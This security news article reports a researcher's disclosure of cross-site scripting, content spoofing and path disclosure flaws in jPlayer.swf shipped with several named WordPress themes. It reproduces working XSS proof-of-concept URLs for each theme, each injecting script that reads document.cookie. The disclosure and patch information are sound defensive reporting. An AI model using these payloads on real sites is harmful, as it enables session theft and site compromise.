Vulnerabilities found in multiple themes for WordPress with jPlayer,issue fixed


Wordpress themes vulnerableMultiple vulnerabilities were found in the themes designed to be used for  Wordpress with jPlayer. There are thousands of themes for WordPress using jPlayer and websites which places Jplayer.swf in other folders besides plugins and themes. The vulnerabilities found to be exposing  the themes and the websites to cross site scriptingcontent spoofing and full disclosure vulnerabilities.

The simple google search puts the number of affected themes to 313,000 and for Jplayer the number is 32,000. All the  themes of all the versions of the following products are affected:-

Studiozen, Photocrati, Music, Imperial Fairytale and Feather12 themes.

These findings were posted in Seclist . The researcher named MustLive also said,

Vulnerabilities are in jPlayer versions before 2.2.23. Version 2.2.23 and the last released version 2.3.0 are not vulnerable to mentioned XSS, except CS via JS and XSS via JS callbacks.

The affected products, Studiozen, Photocrati, Music, Imperial Fairytale and Feather12 themes can be exploited using XSS vulnerability.

Studiozen:
http://site/wp-content/themes/studiozen/js/html5player/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
Photocrati:
http://site/wp-content/themes/photocrati-theme/scripts/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
Music:
http://site/wp-content/themes/music/js/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
Imperial Fairytale:
Feather12:
http://site/wp-content/themes/feather12/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/feather12/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
Content Spoofing:

Any audio or video content can be inserted from external sources using cross site scripting or script. This requires HTML Injection vulnerability at the site.So if the website owner has not taken care in protecting the website against the HTML injection vulnerability, then the website may be exploited using content spoofing.

The researcher on WP themes said,

All mentioned themes have FPD vulnerabilities in php-files (in index.php and others), which is typically for WP themes.
Full Path Disclosure (FPD) reveals the  full operating path of a vulnerable script. The FPD bug is executed by injecting unexpected characters, the unexpected  characters  return an error message that includes information about the error, thus revealing the full operating path of a vulnerable script.
The developer of Jplayer has released the updates but has not completely patched the version 2.3.0. Sothe themes using Jplayer 2.3.0 are still exposed to the XSS vulnerabilty.
Source Seclist
 

 

Advertisements